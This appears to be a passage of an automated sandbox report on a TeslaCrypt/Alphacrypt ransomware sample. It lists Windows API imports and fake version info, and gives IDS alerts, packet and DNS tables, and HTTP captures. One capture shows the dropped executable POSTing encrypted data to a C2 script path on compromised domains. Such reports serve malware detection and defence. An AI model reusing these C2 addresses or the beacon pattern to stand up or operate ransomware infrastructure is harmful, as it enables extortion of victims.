DefDlgProcA, MapDialogRect, DestroyCursor, CreateCursor, IsZoomed, SetSysColors, GetClassNameW, DestroyMenu, CharLowerA, IsCharLowerA, ChangeDisplaySettingsA, CopyImage, GetWindowPlacement, CharLowerW, DestroyIcon, SetScrollPos, IsWindowEnabled, SendNotifyMessageA, GetKeyboardLayout, BringWindowToTop, DialogBoxIndirectParamW, SetUserObjectSecurity, CreateDialogIndirectParamA, GetKeyState, LoadImageW, GetCursorPos, CopyRect, RegisterClassExW, SetMenuItemInfoA, SetForegroundWindow, GetClientRect, CharLowerBuffA, IsCharUpperA, VkKeyScanExA, ReuseDDElParam, WindowFromPoint, GetUserObjectInformationW, LoadAcceleratorsA, DdeAccessData, UnregisterClassA, MsgWaitForMultipleObjects, ToAscii, ReplyMessage, CharUpperW, ShowScrollBar, UnhookWinEvent, MapVirtualKeyW, GetMessageW, WaitMessage, GetClipCursor, SendMessageTimeoutW, GetClipboardFormatNameW, DdeGetData, UnionRect, InSendMessage, GetClassNameA, OffsetRect, SystemParametersInfoA, GetWindow, SetWindowLongW, LoadImageA, TranslateMDISysAccel, DefDlgProcW, ScrollWindow, RedrawWindow, CreateWindowExA, IsClipboardFormatAvailable, SetWindowContextHelpId, SetTimer, GetKeyboardLayoutList, SetRectEmpty, GetMenuCheckMarkDimensions, MessageBoxW, WinHelpA, ModifyMenuW, GetSubMenu, ChangeClipboardChain, TranslateAcceleratorW, DdeClientTransaction, FillRect, keybd_event, GetMessageA, ScrollWindowEx, AdjustWindowRect, SetWindowRgn, RegisterWindowMessageW, WaitForInputIdle, ScreenToClient, DrawIcon, IsChild, SetCaretBlinkTime, LoadIconA, ValidateRect, GetWindowThreadProcessId, GetMessagePos, GetQueueStatus, SetDlgItemTextA, ChildWindowFromPoint, LockWindowUpdate, CheckDlgButton, SetThreadDesktop, RegisterClipboardFormatA, GetNextDlgTabItem, DdeDisconnect, ShowCursor, EnumDesktopWindows, IsWindowVisible, LoadKeyboardLayoutW, TrackPopupMenu, DrawFrameControl, CharUpperA, DispatchMessageW, CallWindowProcA, DdeConnect, FindWindowA, CharToOemBuffA, EnumDisplaySettingsW, CopyIcon, BeginDeferWindowPos, VkKeyScanExW, ValidateRgn, GetOpenClipboardWindow, MapVirtualKeyExA, IsIconic, DestroyCaret, DestroyAcceleratorTable, GetKeyboardLayoutNameW, TrackPopupMenuEx, GetSysColorBrush, FindWindowExW, OpenDesktopA, GetMenuState, PostThreadMessageA, CreateWindowStationW, DrawCaption, PostMessageW, RegisterHotKey, CharPrevA, IsCharAlphaNumericA, PtInRect, LoadStringW, SetDlgItemInt, DrawTextExW, EnumDisplaySettingsA, CreateDialogIndirectParamW, SetWindowPos, OemToCharBuffA, SetClassLongA, GetSysColor, GetCapture, DestroyWindow
                  ADVAPI32.dllRegCloseKey, FreeSid, RegEnumKeyExA, PrivilegedServiceAuditAlarmA, GetServiceDisplayNameW, GetAce, RegQueryValueA, CreateServiceW, BuildTrusteeWithSidW, AddAccessAllowedAce, EnumServicesStatusA, LookupAccountNameW, RegQueryValueW, SetEntriesInAclA, RegSetKeySecurity, GetSecurityDescriptorDacl, RegCreateKeyW, GetSidSubAuthorityCount, DuplicateTokenEx, BuildImpersonateTrusteeA, IsValidSecurityDescriptor, LsaFreeMemory, AddAce, DeleteAce, OpenThreadToken, RegNotifyChangeKeyValue, OpenEventLogW, SetNamedSecurityInfoA, GetFileSecurityW, GetServiceKeyNameW, QueryServiceStatus, LsaAddAccountRights, EqualSid, RegSetValueA, RegCreateKeyExA, RegUnLoadKeyW, CloseServiceHandle, RegReplaceKeyA, InitializeSecurityDescriptor
                  LZ32.dllLZOpenFileW
                  KERNEL32.dllCreateConsoleScreenBuffer, ClearCommBreak, GetModuleHandleA, GetStartupInfoA
                  MFC42.DLL

                  Version Infos

                  DescriptionData
                  LegalCopyrightCopyright (C) 2016
                  InternalNameArtery
                  FileVersion152, 162, 60, 63
                  CompanyNameeSnips Ltd.
                  PrivateBuild38, 97, 22, 219
                  LegalTrademarksUnbar
                  CommentsAlighting
                  ProductNameSilvering Terrains
                  SpecialBuild171, 248, 221, 121
                  ProductVersion202, 130, 29, 218
                  FileDescriptionSnows Amplification Travails
                  OriginalFilenameAintl.EXE

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  03/24/21-18:30:54.406482ICMP384ICMP PING192.168.2.623.0.174.200
                  03/24/21-18:30:54.418525ICMP449ICMP Time-To-Live Exceeded in Transit195.225.118.33192.168.2.6
                  03/24/21-18:30:54.420737ICMP384ICMP PING192.168.2.623.0.174.200
                  03/24/21-18:30:54.431772ICMP449ICMP Time-To-Live Exceeded in Transit91.201.58.73192.168.2.6
                  03/24/21-18:30:54.432170ICMP384ICMP PING192.168.2.623.0.174.200
                  03/24/21-18:30:54.663223ICMP449ICMP Time-To-Live Exceeded in Transit91.206.52.56192.168.2.6
                  03/24/21-18:30:54.663612ICMP384ICMP PING192.168.2.623.0.174.200
                  03/24/21-18:30:54.675395ICMP408ICMP Echo Reply23.0.174.200192.168.2.6
                  03/24/21-18:31:33.121599TCP2022504ET TROJAN Alphacrypt/TeslaCrypt Ransomware CnC Beacon4970980192.168.2.6185.53.178.54
                  03/24/21-18:31:33.363377TCP2022504ET TROJAN Alphacrypt/TeslaCrypt Ransomware CnC Beacon4971080192.168.2.652.60.87.163

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Mar 24, 2021 18:31:11.845717907 CET4970880192.168.2.6176.74.179.58
                  Mar 24, 2021 18:31:14.843369961 CET4970880192.168.2.6176.74.179.58
                  Mar 24, 2021 18:31:20.843956947 CET4970880192.168.2.6176.74.179.58
                  Mar 24, 2021 18:31:33.073937893 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.097671986 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.097799063 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.121507883 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.121598959 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.145405054 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.163768053 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.163794041 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.163810968 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.163822889 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.163872957 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.163918018 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.164192915 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.164273977 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.164302111 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.164318085 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.164335012 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.164349079 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.164350033 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.164434910 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.164515018 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.164525032 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.164527893 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.170809031 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.170892000 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.197130919 CET8049709185.53.178.54192.168.2.6
                  Mar 24, 2021 18:31:33.197242975 CET4970980192.168.2.6185.53.178.54
                  Mar 24, 2021 18:31:33.256886005 CET4971080192.168.2.652.60.87.163
                  Mar 24, 2021 18:31:33.362298965 CET804971052.60.87.163192.168.2.6
                  Mar 24, 2021 18:31:33.362488985 CET4971080192.168.2.652.60.87.163
                  Mar 24, 2021 18:31:33.363377094 CET4971080192.168.2.652.60.87.163
                  Mar 24, 2021 18:31:33.468756914 CET804971052.60.87.163192.168.2.6
                  Mar 24, 2021 18:31:33.469351053 CET804971052.60.87.163192.168.2.6
                  Mar 24, 2021 18:31:33.469456911 CET4971080192.168.2.652.60.87.163
                  Mar 24, 2021 18:33:01.686897993 CET4971080192.168.2.652.60.87.163
                  Mar 24, 2021 18:33:01.793622971 CET804971052.60.87.163192.168.2.6
                  Mar 24, 2021 18:33:01.793818951 CET4971080192.168.2.652.60.87.163

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Mar 24, 2021 18:30:45.511634111 CET6118253192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:45.524399042 CET53611828.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:46.278686047 CET5567353192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:46.291532993 CET53556738.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:47.445313931 CET5777353192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:47.460833073 CET53577738.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:48.196305037 CET5998653192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:48.209749937 CET53599868.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:48.928903103 CET5247853192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:48.941696882 CET53524788.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:50.393752098 CET5893153192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:50.408852100 CET53589318.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:51.549626112 CET5772553192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:51.562321901 CET53577258.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:52.538899899 CET4928353192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:52.555433035 CET53492838.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:53.361766100 CET5837753192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:53.374667883 CET53583778.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:54.023328066 CET5507453192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:54.036071062 CET53550748.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:54.379645109 CET5451353192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:54.404944897 CET53545138.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:54.867042065 CET6204453192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:54.879112959 CET53620448.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:55.925740004 CET6379153192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:55.940521955 CET53637918.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:57.318636894 CET6426753192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:57.333936930 CET53642678.8.8.8192.168.2.6
                  Mar 24, 2021 18:30:58.537717104 CET4944853192.168.2.68.8.8.8
                  Mar 24, 2021 18:30:58.550240993 CET53494488.8.8.8192.168.2.6
                  Mar 24, 2021 18:31:00.711838007 CET6034253192.168.2.68.8.8.8
                  Mar 24, 2021 18:31:00.724864960 CET53603428.8.8.8192.168.2.6
                  Mar 24, 2021 18:31:07.560126066 CET6134653192.168.2.68.8.8.8
                  Mar 24, 2021 18:31:07.578113079 CET53613468.8.8.8192.168.2.6
                  Mar 24, 2021 18:31:08.974765062 CET5177453192.168.2.68.8.8.8
                  Mar 24, 2021 18:31:08.988694906 CET53517748.8.8.8192.168.2.6
                  Mar 24, 2021 18:31:11.660418987 CET5602353192.168.2.68.8.8.8
                  Mar 24, 2021 18:31:11.732952118 CET53560238.8.8.8192.168.2.6
                  Mar 24, 2021 18:31:11.773679972 CET5838453192.168.2.68.8.8.8
                  Mar 24, 2021 18:31:11.823318005 CET53583848.8.8.8192.168.2.6
                  Mar 24, 2021 18:31:32.955301046 CET6026153192.168.2.68.8.8.8
                  Mar 24, 2021 18:31:32.977461100 CET53602618.8.8.8192.168.2.6
                  Mar 24, 2021 18:31:32.998641014 CET5606153192.168.2.68.8.8.8
                  Mar 24, 2021 18:31:33.036665916 CET53560618.8.8.8192.168.2.6
                  Mar 24, 2021 18:31:33.191951990 CET5833653192.168.2.68.8.8.8
                  Mar 24, 2021 18:31:33.255119085 CET53583368.8.8.8192.168.2.6
                  Mar 24, 2021 18:31:33.480635881 CET5378153192.168.2.68.8.8.8
                  Mar 24, 2021 18:31:33.508387089 CET53537818.8.8.8192.168.2.6
                  Mar 24, 2021 18:31:40.431463957 CET5406453192.168.2.68.8.8.8
                  Mar 24, 2021 18:31:40.817528009 CET53540648.8.8.8192.168.2.6
                  Mar 24, 2021 18:32:27.224045038 CET5281153192.168.2.68.8.8.8
                  Mar 24, 2021 18:32:27.254959106 CET53528118.8.8.8192.168.2.6

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Mar 24, 2021 18:31:11.660418987 CET192.168.2.68.8.8.80xc4b3Standard query (0)southinstrument.orgA (IP address)IN (0x0001)
                  Mar 24, 2021 18:31:11.773679972 CET192.168.2.68.8.8.80xbfe9Standard query (0)bddadmin.desjardins.frA (IP address)IN (0x0001)
                  Mar 24, 2021 18:31:32.955301046 CET192.168.2.68.8.8.80x9c1fStandard query (0)grant-pro.comA (IP address)IN (0x0001)
                  Mar 24, 2021 18:31:32.998641014 CET192.168.2.68.8.8.80x6f95Standard query (0)educarpetas.comA (IP address)IN (0x0001)
                  Mar 24, 2021 18:31:33.191951990 CET192.168.2.68.8.8.80x831Standard query (0)iicsdrd.comA (IP address)IN (0x0001)
                  Mar 24, 2021 18:31:33.480635881 CET192.168.2.68.8.8.80xbbedStandard query (0)dunyamuzelerimuzesi.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Mar 24, 2021 18:31:11.732952118 CET8.8.8.8192.168.2.60xc4b3Name error (3)southinstrument.orgnonenoneA (IP address)IN (0x0001)
                  Mar 24, 2021 18:31:11.823318005 CET8.8.8.8192.168.2.60xbfe9No error (0)bddadmin.desjardins.fr176.74.179.58A (IP address)IN (0x0001)
                  Mar 24, 2021 18:31:32.977461100 CET8.8.8.8192.168.2.60x9c1fName error (3)grant-pro.comnonenoneA (IP address)IN (0x0001)
                  Mar 24, 2021 18:31:33.036665916 CET8.8.8.8192.168.2.60x6f95No error (0)educarpetas.com185.53.178.54A (IP address)IN (0x0001)
                  Mar 24, 2021 18:31:33.255119085 CET8.8.8.8192.168.2.60x831No error (0)iicsdrd.com52.60.87.163A (IP address)IN (0x0001)
                  Mar 24, 2021 18:31:33.508387089 CET8.8.8.8192.168.2.60xbbedName error (3)dunyamuzelerimuzesi.comnonenoneA (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • educarpetas.com
                  • iicsdrd.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.649709185.53.178.5480C:\Users\user\AppData\Roaming\mllvvvh.exe
                  TimestampkBytes transferredDirectionData
                  Mar 24, 2021 18:31:33.121598959 CET307OUTPOST /modules/mod_fxprev/libraries/mzsys.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
                  Host: educarpetas.com
                  Content-Length: 645
                  Cache-Control: no-cache
                  Data Raw: 64 61 74 61 3d 45 44 41 42 46 42 39 35 32 32 41 46 36 33 45 43 41 43 39 43 42 36 43 44 44 36 42 35 30 34 36 36 32 35 42 35 43 36 34 33 41 38 30 35 33 44 30 34 33 39 37 44 33 37 46 33 44 44 44 34 30 44 34 30 36 42 36 34 37 44 31 41 34 32 30 43 31 36 34 42 32 42 44 30 39 35 44 35 31 43 43 30 38 44 36 43 30 44 42 34 36 38 35 42 36 35 34 43 31 44 46 32 36 42 45 43 45 36 34 41 43 33 36 39 34 45 36 42 45 38 45 35 35 42 42 41 42 33 39 37 33 41 33 41 33 41 43 37 38 30 41 32 45 31 42 32 30 46 45 31 43 44 33 43 33 35 39 42 30 38 39 34 43 36 41 46 37 31 45 44 38 45 42 33 38 38 36 34 41 41 39 42 42 42 45 43 39 38 43 45 44 31 42 43 42 42 41 39 39 35 38 41 33 37 43 42 35 30 43 36 36 39 35 42 33 33 42 42 44 38 45 43 39 38 33 41 38 32 35 45 32 32 44 46 45 44 46 38 36 30 45 37 36 31 36 30 41 44 41 35 35 37 44 43 34 43 33 44 37 38 32 36 35 37 39 39 37 31 38 32 31 43 44 46 38 30 38 44 41 38 30 34 41 41 43 45 46 34 42 45 45 34 33 38 46 39 30 36 44 31 33 31 31 45 34 45 45 39 45 46 37 37 33 33 33 38 45 38 42 44 44 44 42 39 46 34 45 46 39 37 38 45 30 34 42 41 39 31 41 38 35 42 44 45 35 33 32 31 39 41 38 43 34 43 36 37 34 32 39 46 30 43 33 46 32 31 45 36 43 41 33 36 44 36 45 42 32 34 32 39 38 42 37 45 39 35 38 30 45 33 41 45 34 33 36 38 35 41 33 43 44 44 42 32 32 42 30 42 35 32 42 32 37 44 45 30 42 36 46 43 44 30 35 36 43 33 33 35 31 30 34 42 45 32 44 41 41 37 45 32 46 42 43 41 42 41 41 30 44 46 37 39 37 36 37 30 37 35 31 42 30 46 36 41 35 35 45 31 30 38 30 32 37 32 32 44 46 43 43 42 31 43 46 43 32 34 46 31 37 34 42 38 46 35 33 39 30 36 46 35 42 46 31 41 43 30 38 44 41 37 36 33 36 43 35 34 30 37 33 31 44 34 36 35 44 30 43 42 36 44 39 37 45 38 39 31 43 39 31 39 32 43 39 39 41 41 44 32 46 39 30 39 32 33 44 38 35 34 38 41 39 34 36 43 35 42 36 45 41 43 46 37 41 31 46 41 45 45 41 44 45 32 45 36 37 41 44 35 45 39 35 39 33 43 34 36 34 37 30 41 38 37 39 44 34 36 31 32 34 30 31 30 46 41 42 37 44 32 42 42 34 37 30 43 37 37 39 43 36 39
                  Data Ascii: data=EDABFB9522AF63ECAC9CB6CDD6B5046625B5C643A8053D04397D37F3DDD40D406B647D1A420C164B2BD095D51CC08D6C0DB4685B654C1DF26BECE64AC3694E6BE8E55BBAB3973A3A3AC780A2E1B20FE1CD3C359B0894C6AF71ED8EB38864AA9BBBEC98CED1BCBBA9958A37CB50C6695B33BBD8EC983A825E22DFEDF860E76160ADA557DC4C3D7826579971821CDF808DA804AACEF4BEE438F906D1311E4EE9EF773338E8BDDDB9F4EF978E04BA91A85BDE53219A8C4C67429F0C3F21E6CA36D6EB24298B7E9580E3AE43685A3CDDB22B0B52B27DE0B6FCD056C335104BE2DAA7E2FBCABAA0DF797670751B0F6A55E10802722DFCCB1CFC24F174B8F53906F5BF1AC08DA7636C540731D465D0CB6D97E891C9192C99AAD2F90923D8548A946C5B6EACF7A1FAEEADE2E67AD5E9593C46470A879D46124010FAB7D2BB470C779C69
                  Mar 24, 2021 18:31:33.163768053 CET309INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Wed, 24 Mar 2021 17:31:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Vary: Accept-Encoding
                  X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
                  Accept-CH: viewport-width, dpr, device-memory, rtt, downlink, ect, ua, ua-full-version, ua-platform, ua-platform-version, ua-arch, ua-model, ua-mobile
                  Accept-CH-Lifetime: 30
                  X-Language: english
                  X-Template: tpl_CleanPeppermintBlack_twoclick
                  X-Buckets: bucket084
                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_gGxmH7J66VPH/uycHGnedoT0oDiO6/h0DaJvh6tPj0hUQ/lLNW7S8VxfpJpFGzgmBtaDjPwW/Sv917ekHfRNXQ==
                  Data Raw: 64 30 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 67 47 78 6d 48 37 4a 36 36 56 50 48 2f 75 79 63 48 47 6e 65 64 6f 54 30 6f 44 69 4f 36 2f 68 30 44 61 4a 76 68 36 74 50 6a 30 68 55 51 2f 6c 4c 4e 57 37 53 38 56 78 66 70 4a 70 46 47 7a 67 6d 42 74 61 44 6a 50 77 57 2f 53 76 39 31 37 65 6b 48 66 52 4e 58 51 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 65 64 75 63 61 72 70 65 74 61 73 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61
                  Data Ascii: d02<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_gGxmH7J66VPH/uycHGnedoT0oDiO6/h0DaJvh6tPj0hUQ/lLNW7S8VxfpJpFGzgmBtaDjPwW/Sv917ekHfRNXQ==" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <title>educarpetas.com</title><script src="//www.google.com/adsense/domains/caf.js" type="text/java
                  Mar 24, 2021 18:31:33.163794041 CET310INData Raw: 73 63 72 69 70 74 22 20 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 64 31 6c 78 68 63 34 6a 76 73 74 7a 72 70 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 74 68 65 6d 65 73 2f 61 73 73 65 74 73 2f 73 74 79 6c
                  Data Ascii: script" ></script><link href="//d1lxhc4jvstzrp.cloudfront.net/themes/assets/style.css" rel="stylesheet" type="text/css" media="screen" /><link href="//d1lxhc4jvstzrp.cloudfront.net/themes/cleanPeppermint_7a82f1f3/style.css" rel="stylesheet
                  Mar 24, 2021 18:31:33.163810968 CET312INData Raw: 73 3d 22 77 72 61 70 70 65 72 32 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                  Data Ascii: s="wrapper2"> <div class="wrapper3"> <div class="tcHolder"> <div id="tc"></div><div class="searchHolder"><div id="search"></div></div> </div> </div>
                  Mar 24, 2021 18:31:33.163822889 CET312INData Raw: 65 72 74 69 73 65 72 73 2e 20 49 6e 20 63 61 73 65 20 6f 66 20 74 72 61 64 65 6d 61 72 6b 20 69 73 73 75 65 73 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 64 0d 0a
                  Data Ascii: ertisers. In case of trademark issues please contact the d
                  Mar 24, 2021 18:31:33.164192915 CET313INData Raw: 31 65 30 64 0d 0a 6f 6d 61 69 6e 20 6f 77 6e 65 72 20 64 69 72 65 63 74 6c 79 20 28 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 63 61 6e 20 62 65 20 66 6f 75 6e 64 20 69 6e 20 77 68 6f 69 73 29 2e 0a 0a 3c 62 72 2f 3e 3c 62 72 2f
                  Data Ascii: 1e0domain owner directly (contact information can be found in whois).<br/><br/><a href="javascript:void(0);" onClick="showPolicy();">Privacy Policy</a><br/><br/><br/><br/></div></div><script type="text/javascript" language="JavaScr
                  Mar 24, 2021 18:31:33.164302111 CET315INData Raw: 64 3d 5b 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 6e 69 71 75 65 54 72 61 63 6b 69 6e 67 49 44 3d 27 4d 54 59 78 4e 6a 59 77 4e 7a 41 35 4d 79 34 78 4e 44 4d 34 4f 6a 6b 78 4e 54 6c 6a 4d 7a 63 31 4f 54 67 30 4d 6a 59 7a 5a 44
                  Data Ascii: d=[]; var uniqueTrackingID='MTYxNjYwNzA5My4xNDM4OjkxNTljMzc1OTg0MjYzZDVhNGY2ZWEyMTdkM2ZlMzMwZTdkMWJiNDAwYTUzMGRjNDI4M2RlZDQzNTNmZWI1ODc6NjA1Yjc3NzUyMzFhNg=='; var search=''; var is_afs=false; var
                  Mar 24, 2021 18:31:33.164318085 CET316INData Raw: 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27
                  Data Ascii: ascript' language='JavaScript'></script><script type='text/javascript' language='JavaScript'>x(pageOptions,{resultsPageBaseUrl: 'http://educarpetas.com/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwODR8fHx8fHw2MDViNzc3NTIxNjM4fHx8MTYxNj
                  Mar 24, 2021 18:31:33.164335012 CET317INData Raw: 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 78 28 70 61 67 65 4f 70 74 69 6f 6e 73 2c 7b 64 6f 6d 61 69 6e 52 65 67 69 73 74 72 61 6e 74 3a 27 61 73 2d 64 72 69 64 2d 32 37 30 37 36 35 34 32 38 35 35 30 38 39 36 38 27 7d 29 3b 3c 2f
                  Data Ascii: guage='JavaScript'>x(pageOptions,{domainRegistrant:'as-drid-2707654285508968'});</script><script type="text/javascript">function loadFeed(){ var c = google.ads.domains.Caf; var a = Array.prototype.slice.call(arguments); switch (a.leng
                  Mar 24, 2021 18:31:33.164350033 CET319INData Raw: 55 54 46 2d 38 22 29 3b 0a 20 20 20 20 78 68 72 2e 73 65 6e 64 28 27 5f 3d 27 20 2b 20 70 61 79 6c 6f 61 64 29 3b 0a 7d 3b 0a 6c 73 28 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2c 20 73 63 72 69 70 74 50 61 74 68 2c 20 27 32 31
                  Data Ascii: UTF-8"); xhr.send('_=' + payload);};ls(new XMLHttpRequest(), scriptPath, '2101|||605b7775244e5eyJvd25lcilse0d16faf4aI6MTA3NTYsImRvbWFpbiI6ImVkdWNhcnBldGFzLmNvbSIsInVuaXFJRCI6Ik1UWXhOall3TnpBNU15NHhORE00T2preE5UbGpNemMxT1RnME1qWXpaRFZoTkd
                  Mar 24, 2021 18:31:33.164434910 CET320INData Raw: 49 69 4f 69 4a 33 63 79 30 77 4e 43 35 74 64 57 4d 75 63 47 4e 79 5a 58 63 75 61 57 38 69 4c 43 4a 79 64 43 49 36 49 6a 41 75 4d 44 45 78 4f 44 6b 34 4f 54 6b 30 4e 44 51 32 49 69 77 69 5a 58 68 30 53 58 41 69 4f 69 49 78 4f 44 55 75 4e 54 4d 75
